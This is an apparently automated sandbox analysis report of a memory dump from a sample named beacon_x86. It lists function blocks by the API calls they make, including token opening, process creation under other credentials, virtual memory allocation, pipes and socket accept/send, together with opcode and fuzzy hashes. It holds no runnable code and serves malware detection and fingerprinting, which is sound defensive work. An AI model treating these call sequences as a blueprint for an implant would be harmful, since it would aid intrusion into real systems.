          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
          • String ID:
          • API String ID: 3240763771-0
          • Opcode ID: 7f327d19f35a230e7a67add50bcefbd1a5cc43240291b8d7c34d455d97766cdb
          • Instruction ID: 031b850cb27dd944884306c44119e97b8a850eeb7a05069e5beff2b7cac5500a
          • Opcode Fuzzy Hash: 7f327d19f35a230e7a67add50bcefbd1a5cc43240291b8d7c34d455d97766cdb
          • Instruction Fuzzy Hash: B041C331A40B05DFDB249FA9888859EB7B2EF80720F28C269E45DD7541FB70DE40AB74
          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • _memset.LIBCMT ref: 00D63BDD
          • GetStartupInfoA.KERNEL32(?), ref: 00D63BF5
          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,00D622CF), ref: 00D63C8F
          • GetLastError.KERNEL32 ref: 00D63C9E
            • Part of subcall function 00D616E2: _vswprintf_s.LIBCMT ref: 00D616FE
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
          • String ID:
          • API String ID: 709525413-0
          • Opcode ID: c297b68ced4b71eb6d1f13605dc924ae2f83f012de2d1694eed0c160b6f3bcfb
          • Instruction ID: 791dd47b69db8b49c60a8be9bcd15c5076c29fc5b47c0ccc1d9ac474151611eb
          • Opcode Fuzzy Hash: c297b68ced4b71eb6d1f13605dc924ae2f83f012de2d1694eed0c160b6f3bcfb
          • Instruction Fuzzy Hash: 5A412571900208BBDF01AFAADC45EEFBFB9EF49750F104016F618A6261D7758A10DB75
          APIs
          • __time64.LIBCMT ref: 00D6BC7B
            • Part of subcall function 00D78E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D6BB2D,00000000,00000080,?,?,?,00D603F0,?,00000000,00000000,00000000,00000000), ref: 00D78E99
            • Part of subcall function 00D78E8E: __aulldiv.LIBCMT ref: 00D78EB9
          • __time64.LIBCMT ref: 00D6BC96
          • __time64.LIBCMT ref: 00D6BD26
          • __time64.LIBCMT ref: 00D6BD8A
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __time64$Time$FileSystem__aulldiv
          • String ID:
          • API String ID: 4218076520-0
          • Opcode ID: 88fc2899c87e11055618cf3b761bad6944d13ebadb6f98dc293141b56189e720
          • Instruction ID: 87065aee8443241206f64a0402e8d2969080624a42cb7624b9b5bcb70cc103af
          • Opcode Fuzzy Hash: 88fc2899c87e11055618cf3b761bad6944d13ebadb6f98dc293141b56189e720
          • Instruction Fuzzy Hash: ED4137B5900704CFC325CF69E982469BBF4FB98321728862FE1AACA364D7705980DF71
          APIs
          • GetModuleHandleA.KERNEL32(00D90690,00D9067C,00000000,00000000), ref: 00D65704
          • GetProcAddress.KERNEL32(00000000), ref: 00D6570B
            • Part of subcall function 00D65638: _malloc.LIBCMT ref: 00D65657
          • Thread32Next.KERNEL32(00000000,0000001C), ref: 00D6578E
          • Sleep.KERNEL32(000000C8,00000000,0000001C,00000000,0000001C,00000004,00000000), ref: 00D657A4
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AddressHandleModuleNextProcSleepThread32_malloc
          • String ID:
          • API String ID: 788978452-0
          • Opcode ID: 0db71ac4f6b3e777d68b8a8ac97da36edd3c277fbfaead02c4748e9aa936284d
          • Instruction ID: 21deaecb91e17466ef5a9b84bb72b2ae402938aa6d10294b2500ab3efbd6eecd
          • Opcode Fuzzy Hash: 0db71ac4f6b3e777d68b8a8ac97da36edd3c277fbfaead02c4748e9aa936284d
          • Instruction Fuzzy Hash: 89314D71900218BFDF10EFA4EC45AEEBBB9EB44710F144425FA05E7154E7709A95CBB1
          APIs
          • _memset.LIBCMT ref: 00D6631D
          • _memset.LIBCMT ref: 00D66335
            • Part of subcall function 00D66260: GetLastError.KERNEL32(-0000EA60,00000000,?,00D627B2,?), ref: 00D6627A
          • Sleep.KERNEL32(000001F4), ref: 00D663C8
          • GetLastError.KERNEL32 ref: 00D663D4
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast_memset$Sleep
          • String ID:
          • API String ID: 4288913296-0
          • Opcode ID: be42a5ab81933c2f732416797d0997a6a7426d63035804537c0cc7ba21e40ca8
          • Instruction ID: 3add8685b786dd0dd4c7ab1d3336e8c5dd7561ddb1c9e77e14d52eb533328a7a
          • Opcode Fuzzy Hash: be42a5ab81933c2f732416797d0997a6a7426d63035804537c0cc7ba21e40ca8
          • Instruction Fuzzy Hash: B431607690431D6FDF11ABE4DC82EEE77BCEB08314F080066F614A6182EA35DA188775
          APIs
          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D8290C
          • __isleadbyte_l.LIBCMT ref: 00D82940
          • MultiByteToWideChar.KERNEL32(DA2A2035,00000009,00D90534,FFFFFB50,00D90534,00000000,?,?,?,00D61A3F,00D90534,00D90534,00000000), ref: 00D82971
          • MultiByteToWideChar.KERNEL32(DA2A2035,00000009,00D90534,00000001,00D90534,00000000,?,?,?,00D61A3F,00D90534,00D90534,00000000), ref: 00D829DF
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
          • String ID:
          • API String ID: 3058430110-0
          • Opcode ID: 8cde108e12180358b75379549207ea0c15258352bded68de0400c671679f4011
          • Instruction ID: 3be0547afff1677bb08adb3afa5163efc2e3f251d2d2e8cbdb3579dc7df386b0
          • Opcode Fuzzy Hash: 8cde108e12180358b75379549207ea0c15258352bded68de0400c671679f4011
          • Instruction Fuzzy Hash: 84319D31A4024AEFDB20FF68C885ABE7BA5FF01310F1985A9E4A59B191D330D940DF71
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateInfoPipeSleepStartup_memset
          • String ID:
          • API String ID: 112726305-0
          • Opcode ID: 1977be091623a6bf4f06d62d65cb11d67600b85e64c0ec9af0265fe120297b26
          • Instruction ID: aa287071485f8e7b48a0469be451a78a896f3c1aefcaaaac613b680228101d2d
          • Opcode Fuzzy Hash: 1977be091623a6bf4f06d62d65cb11d67600b85e64c0ec9af0265fe120297b26
          • Instruction Fuzzy Hash: AF312A7280020DAFDF01EFA8DD45ADEBBB9FF08314F104116F914B6151EB729A55DB61
          APIs
          • _memset.LIBCMT ref: 00D65C39
          • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 00D65C52
          • SetLastError.KERNEL32(00000005,?,?,00000000), ref: 00D65C77
            • Part of subcall function 00D6C320: GetCurrentProcess.KERNEL32(000001B0,?,?,?,?,00D61023,00000000,000001B0,?,00000000,00000080,?,?,00D6458E,00D971B0,00000000), ref: 00D6C369
            • Part of subcall function 00D6C320: NtAllocateVirtualMemory.NTDLL(00000000,000001B0,00000000,00000000,00003000,00000000), ref: 00D6C384
            • Part of subcall function 00D6C320: VirtualAlloc.KERNEL32(00000000,00D61023,00003000,00000000,000001B0,?,?,?,?,00D61023,00000000,000001B0,?,00000000,00000080), ref: 00D6C3CA
          • SetLastError.KERNEL32(00000006,?,?,00000000), ref: 00D65CF4
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLastVirtual$AllocAllocateCurrentMemoryProcessVersion_memset
          • String ID:
          • API String ID: 1286918773-0
          • Opcode ID: 762f537227a7497c406b4f779d061f859debb81e3013d2f3a28d36f7b92bd1d6
          • Instruction ID: 133566f5b7422d522935249e86ff3df9e121e2442ac6287460531d9ed99cba25
          • Opcode Fuzzy Hash: 762f537227a7497c406b4f779d061f859debb81e3013d2f3a28d36f7b92bd1d6
          • Instruction Fuzzy Hash: 0821F872A10714AFDB30DB74AC46B9B77A4EF04720F150065FA4EEB285DA709A858BB0
          APIs
          • GetLastError.KERNEL32 ref: 00D6851B
          • UpdateProcThreadAttribute.KERNELBASE(?,00000000,00020000,?,00000004,00000000,00000000), ref: 00D68549
          • GetLastError.KERNEL32 ref: 00D68553
          • GetCurrentProcess.KERNEL32(00000000,00000000,?), ref: 00D68588
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ErrorLast$AttributeCurrentProcProcessThreadUpdate
          • String ID:
          • API String ID: 3105217703-0
          • Opcode ID: 02180b6742025f926b0e2e1fdf60561f5279dae8aacf5a49ea077228bf79bf24
          • Instruction ID: eb92797c4fa188528dc6c2364a0cd5705c0b62b1ff3b99f79412c76f7a68f696
          • Opcode Fuzzy Hash: 02180b6742025f926b0e2e1fdf60561f5279dae8aacf5a49ea077228bf79bf24
          • Instruction Fuzzy Hash: 5E2160B6610304BFEB14AFA8DC4AD7B33ACEB08750B18191DFA06D3241EA70ED109B71
          APIs
          • _malloc.LIBCMT ref: 00D66033
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • htonl.WS2_32(?), ref: 00D66048
          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000080), ref: 00D660AF
          • _memset.LIBCMT ref: 00D660E0
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateHeapObjectSingleWait_malloc_memsethtonl
          • String ID:
          • API String ID: 3856049160-0
          • Opcode ID: 86f75236161b853c113a9db91b4568b2828bf246070ad0c79c58977c1c7f7769
          • Instruction ID: 881793a0ca4f35a135c3cf888bde5511b391b87bb44b7482bc19ec665d04bf2d
          • Opcode Fuzzy Hash: 86f75236161b853c113a9db91b4568b2828bf246070ad0c79c58977c1c7f7769
          • Instruction Fuzzy Hash: 5721F271900200EBDF20AFA8D886A6A77B8FF04760F5541B5FD44AB182E770CD8587B5
          APIs
          • _memset.LIBCMT ref: 00D622FF
          • CreatePipe.KERNEL32(?,?,?,00100000), ref: 00D62335
          • GetStartupInfoA.KERNEL32(?), ref: 00D6233F
          • WaitForSingleObject.KERNEL32(?,00002710), ref: 00D62383
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateInfoObjectPipeSingleStartupWait_memset
          • String ID:
          • API String ID: 468459245-0
          • Opcode ID: 5ae9e11e1fd34f1070f2012b2a6a18fe489576fc6ea54d326c77b4c6a62b6578
          • Instruction ID: 861c8b822290f9eb8c50ffd3633015f2ba33f9f0a196763241cdfde0cc724ae3
          • Opcode Fuzzy Hash: 5ae9e11e1fd34f1070f2012b2a6a18fe489576fc6ea54d326c77b4c6a62b6578
          • Instruction Fuzzy Hash: C32139B2C00618BFDF10DFA8DD45ADEBBB9FF08310F100126FA04E6251E7719A058BA1
          APIs
          • _malloc.LIBCMT ref: 00D6014F
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D601A4
          • _memset.LIBCMT ref: 00D601B3
          • _memset.LIBCMT ref: 00D601CA
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$AllocateHeap_malloc
          • String ID:
          • API String ID: 1114209484-0
          • Opcode ID: 31a8ad4906466bab4edcd8ad1c261fba71611a44a44038fef5dc812f5f40bc51
          • Instruction ID: 09565025d2f249f467a22b9dedf54c3cc2f03d403111d100a0adc0ae53bf23d9
          • Opcode Fuzzy Hash: 31a8ad4906466bab4edcd8ad1c261fba71611a44a44038fef5dc812f5f40bc51
          • Instruction Fuzzy Hash: 1011D071600345BBD7206F24CC81AAB7F6EDF67364F180564E448D3242F3269E0583B0
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset
          • String ID:
          • API String ID: 2102423945-0
          • Opcode ID: ffeb7b3de3ffea1e17a76e0e650e9cb768e3f28beeaeaa57777a8ffe4d979dfd
          • Instruction ID: 1d5258490df1e04157cec5b4402a85e7c0bc1ccfb0de6844f635add0fbdea131
          • Opcode Fuzzy Hash: ffeb7b3de3ffea1e17a76e0e650e9cb768e3f28beeaeaa57777a8ffe4d979dfd
          • Instruction Fuzzy Hash: D40161B15052147BDB216F71DC85EAF3A9DEB49374B148037FA18D7212E7348981EBB1
          APIs
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _clock
          • String ID:
          • API String ID: 876827150-0
          • Opcode ID: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
          • Instruction ID: dbd862f51469f2d50654a9231ae4ad31656d97c91ca9dbe378d84bab4cf41d75
          • Opcode Fuzzy Hash: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
          • Instruction Fuzzy Hash: 49015E71E04659EF8B10EFE8A4C15BDBBB5EF40384F2580BAE842A6245D7308E41CBF0
          APIs
          • Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00D606C4), ref: 00D6CE84
          • RtlExitUserThread.NTDLL(00000000,00000000,00000000,00000080,00D606C4), ref: 00D6CE8E
          • WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00D606C4), ref: 00D6CEAF
          • ExitProcess.KERNEL32 ref: 00D6CEBB
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Exit$ObjectProcessSingleSleepThreadUserWait
          • String ID:
          • API String ID: 845863014-0
          • Opcode ID: da1c87cf4876c2b4111b7dd91a6f100e8f5e4773067ca748586e651eff725d01
          • Instruction ID: a2f8524f6136f9b56f1b791996d525b5be1fa0e6284215d1f6a6052d6ec034d0
          • Opcode Fuzzy Hash: da1c87cf4876c2b4111b7dd91a6f100e8f5e4773067ca748586e651eff725d01
          • Instruction Fuzzy Hash: 87F0F0B2798300ABF9303BBE6C8EF3F2A29DB54B66F100117F364991D2CE6648404236
          APIs
          • GetCurrentThread.KERNEL32 ref: 00D6D0AE
          • OpenThreadToken.ADVAPI32(00000000), ref: 00D6D0B5
          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00D6D0C5
          • OpenProcessToken.ADVAPI32(00000000), ref: 00D6D0CC
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentOpenProcessThreadToken
          • String ID:
          • API String ID: 3974789173-0
          • Opcode ID: bdedb79d3d80b6d4c457add277abdd7f847f2715ceb0e23c3ea00b26860ac7ee
          • Instruction ID: 83ed2c7991b5ff6501bc21189b94c1e5b8791447c6396647c74c45634487b50d
          • Opcode Fuzzy Hash: bdedb79d3d80b6d4c457add277abdd7f847f2715ceb0e23c3ea00b26860ac7ee
          • Instruction Fuzzy Hash: 43F0F972A10304ABEB10ABA8ED0AFAE37A9EB04745F144056F501D51A5DAB5D9049771
          APIs
          • accept.WS2_32(?,00000000,00000000), ref: 00D6DD5D
          • send.WS2_32(00000000,?,?,00000000), ref: 00D6DD8A
          • send.WS2_32(00000000,?,?,00000000), ref: 00D6DD98
          • closesocket.WS2_32(00000000), ref: 00D6DDA3
            • Part of subcall function 00D6DCDF: closesocket.WS2_32(?), ref: 00D6DCE1
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: closesocketsend$accept
          • String ID:
          • API String ID: 2168303407-0
          • Opcode ID: 3b5e22ecd3647913ef66369daab4286cdf996cc696f414f716ab0ab281f9e2fa
          • Instruction ID: ba3d46c24534d2b754ea88673126244ea140882929f949dc83f242ffe5392cb7
          • Opcode Fuzzy Hash: 3b5e22ecd3647913ef66369daab4286cdf996cc696f414f716ab0ab281f9e2fa
          • Instruction Fuzzy Hash: 0BF0B476600704BBD6303BB4FC42F46B76EEF08730F204A56F69695493C672E8509BB8
          APIs
          • __getptd.LIBCMT ref: 00D80296
            • Part of subcall function 00D7C797: __getptd_noexit.LIBCMT ref: 00D7C79A
            • Part of subcall function 00D7C797: __amsg_exit.LIBCMT ref: 00D7C7A7
          • __getptd.LIBCMT ref: 00D802AD
          • __amsg_exit.LIBCMT ref: 00D802BB
          • __lock.LIBCMT ref: 00D802CB
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
          • String ID:
          • API String ID: 3521780317-0
          • Opcode ID: c89289a2c2ac748a1ac2efb9f971ef57a4e8aee108b339cb2741c3041abc8373
          • Instruction ID: c9d908e21f384a13df0af415d69ca5a138b01d8dc81fbd346cf7c3cd2bd028e1
          • Opcode Fuzzy Hash: c89289a2c2ac748a1ac2efb9f971ef57a4e8aee108b339cb2741c3041abc8373
          • Instruction Fuzzy Hash: 98F0B432941700EFD760FBB8840AB4C7BA0FF41720F15854AF448AB2C2DBB49909CB7A
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset
          • String ID: l.dl$ntdl
          • API String ID: 2102423945-1236859653
          • Opcode ID: fdb6297e7cbd8406269c93f82204456c1cf00d7e15b5db9edf4be9e089ab1587
          • Instruction ID: 47548beb8c232f9101247c73c00d70ddb9590da57adf47b31e4753195092ea08
          • Opcode Fuzzy Hash: fdb6297e7cbd8406269c93f82204456c1cf00d7e15b5db9edf4be9e089ab1587
          • Instruction Fuzzy Hash: 0A514D75900605DFCB20CF58C480AADB7F1FF58314F29809AD945AB361D731AD81CFA0
          APIs
          • GetCurrentProcess.KERNEL32(00D9EFA8,?,?,?,00D60DD8,00008000,00000000,00000000,00000001,?,?,00D6CE6B,00000000,00000001,00000000,00000000), ref: 00D6C4C7
          • VirtualFree.KERNEL32(00D9EFA8,00000000,00000080,00D9EFA8,?,?,?,00D60DD8,00008000,00000000,00000000,00000001,?,?,00D6CE6B,00000000), ref: 00D6C523
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentFreeProcessVirtual
          • String ID: p,Fw
          • API String ID: 2843569277-326028312
          • Opcode ID: 85a8a00b8a13c0783ad18834504298abe5e92570917de41dc4d60e26656e6e08
          • Instruction ID: 487cfc596b7d9066b476256f1e9517d3861f397f04fb12df074654cdf9a22f8c
          • Opcode Fuzzy Hash: 85a8a00b8a13c0783ad18834504298abe5e92570917de41dc4d60e26656e6e08
          • Instruction Fuzzy Hash: 1A11ADB1821314EF8B25DF44DC898BE7BB9F749B40B14441AF046D2720D770AA85DFB1
          APIs
          • _memset.LIBCMT ref: 00D6BA03
          • GetCurrentProcess.KERNEL32(00D60A51), ref: 00D6BA1D
            • Part of subcall function 00D6B960: _memset.LIBCMT ref: 00D6B97A
            • Part of subcall function 00D6B960: __snprintf.LIBCMT ref: 00D6B9D9
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$CurrentProcess__snprintf
          • String ID: system32
          • API String ID: 3270679572-3483537008
          • Opcode ID: 5902010e01b02d3031c9f0ce9f587a870865ac8a0e712457307f4c1d3a6c52d7
          • Instruction ID: 1018a63416218b7125b95d9357ae2b3b7df4d3bfb6a174dd6a7c06f8a7ede881
          • Opcode Fuzzy Hash: 5902010e01b02d3031c9f0ce9f587a870865ac8a0e712457307f4c1d3a6c52d7
          • Instruction Fuzzy Hash: C2F05E316843046FF7146B90FC47B693798DF00724F14401BF908AA3D2FBA565808A79
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000001.00000002.3882062831.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Failure
          • String ID: abcdefghijklmnop$abcdefghijklmnop
          • API String ID: 3995482717-935656707
          • Opcode ID: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
          • Instruction ID: c3a5576e9cfc101ee22ed094d5e360673ad390940dac31f6f0b67ec56a1d2658
          • Opcode Fuzzy Hash: 4d1227ede6a145633f070787483e74cd4d58cfad1496ae03b9bb51402f780a7b
          • Instruction Fuzzy Hash: C3D0C97720D2087EF920B45A7D07FBB7B6CD7C1B75FB041ABF9088508069026D2652B9
          APIs
          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022CE
          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022F5
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022FC
          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 0040231C
          Memory Dump Source
          • Source File: 00000001.00000002.3873850428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000001.00000002.3873609238.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875774639.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3875936074.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876341006.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000001.00000002.3876566738.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CriticalSection$EnterErrorLastLeaveValue
          • String ID:
          • API String ID: 682475483-0
          • Opcode ID: 3e49c145e7cda86df6080b1c3b5656d3cc1d329760b6f4bb8e53dbee9a39bf48
          • Instruction ID: db0b3c927cb9be537e2116d15c0f7f13df8c87252735a744e9a29fbe81bf0797
          • Opcode Fuzzy Hash: 3e49c145e7cda86df6080b1c3b5656d3cc1d329760b6f4bb8e53dbee9a39bf48
          • Instruction Fuzzy Hash: BAF0A4756007108BC7107FB8D9C861B7BA4AA48345B0505B9DE845735AE778EC08CBAA